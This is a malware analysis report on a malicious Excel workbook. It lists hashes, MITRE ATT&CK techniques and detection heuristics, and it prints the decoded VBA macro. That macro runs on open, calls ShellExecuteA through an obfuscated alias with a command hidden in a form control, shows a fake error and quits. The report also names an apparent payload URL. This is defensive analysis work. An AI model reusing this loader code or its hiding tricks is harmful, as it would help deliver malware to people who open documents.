Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5d1a0f2b5908c158…

MALICIOUS

Office (OOXML)

Size: 340.6 KB
Created: 2020-06-03 09:29:42 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2020-09-07
MD5: bcdadfdc16bcf022384c4631849e1396
SHA-1: d8037e4d08b75991123dd881e8d7d90ac236ef5f
SHA-256: 5d1a0f2b5908c1583c889abea48061acb019f21d50f928fb5dd876434255d8d6
Risk Score: 70

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

This Excel document contains a Workbook_Open VBA macro designed to execute a command as soon as the workbook is opened. The macro calls the ShellExecuteA API (imported from shell32 under an obfuscated alias), a technique often used to download and execute a second-stage payload. The embedded URL was likely intended to host that payload.

Heuristics (4)

  • VBA project inside OOXML (severity: medium; 2 related findings) [OOXML_VBA]
    Document contains a VBA project: VBA macros present (project part renamed away from vbaProject.bin: xl/dvdsvhufhuierhiu.txt).
  • VBA project part renamed to evade filename detection (severity: high) [OOXML_VBA_PROJECT_RENAMED]
    The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Workbook_Open macro (severity: low) [OLE_VBA_WBOPEN]
    Matched lines in script:
      #End If
      Sub wORKBooK_oPen(): Call mPvdt: End Sub
      Sub mPvdt()
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://ntro.fr/gtrdek/officeclick.png
    Channel: document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename / Kind / Source / Size
macros.bas (kind: vba-macro; source: oletools.olevba.extract_macros, decoded VBA source from OOXML; size: 2726 bytes)
SHA-256: a7b4475fbe67a5aef18d3c4c2ca4d0049285cb2fe9f3d892247bd028255dce11
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub bdbrx()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
#If Win64 Then
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As LongPtr, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As LongPtr) As LongPtr
#Else
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As Long, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As Long) As Long
#End If
#Else
#If Win64 Then
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As LongPtr, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As LongPtr) As LongPtr
#Else
Private Declare Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As Long, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As Long) As Long
#End If
#End If
Sub wORKBooK_oPen(): Call mPvdt: End Sub
Sub mPvdt()
Call yVhgV
End Sub
Sub yVhgV()
Call wGLTT
End Sub
Static Sub wGLTT()
Call IMxWv
End Sub
Sub IMxWv()
Call USjZX
End Sub
Sub USjZX()
Call SDMLV
End Sub
Static Sub SDMLV()
Call eJzOx
End Sub
Sub eJzOx()
Call qPlRZ
End Sub
Sub qPlRZ()
Call CVXUA
End Sub
Static Sub CVXUA()
Call AGBHy
End Sub
Function AGBHy() As Variant
Call Gsbsz(0, "oPEn", Split(UserForm1.CheckBox1.GroupName, ChrW$(32))(0), Right(UserForm1.CheckBox1.GroupName, Len(UserForm1.CheckBox1.GroupName) - Len(Split(UserForm1.CheckBox1.GroupName, ChrW$(32))(0))), "", 1)
MsgBox ("The filename, directory name, or volume label syntax is incorrect.")
Application.Quit
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8C3E8C44-A29C-418F-9ECA-FA230E799425}{013334C2-8723-4AC4-A94B-DFA180F51A91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin (kind: vba-project; source: OOXML VBA project, xl/dvdsvhufhuierhiu.txt; size: 25088 bytes)
SHA-256: efb1e49a1ba9b09f97684e3e49dee70cce454c1cfbe08e38b10adb2e15641266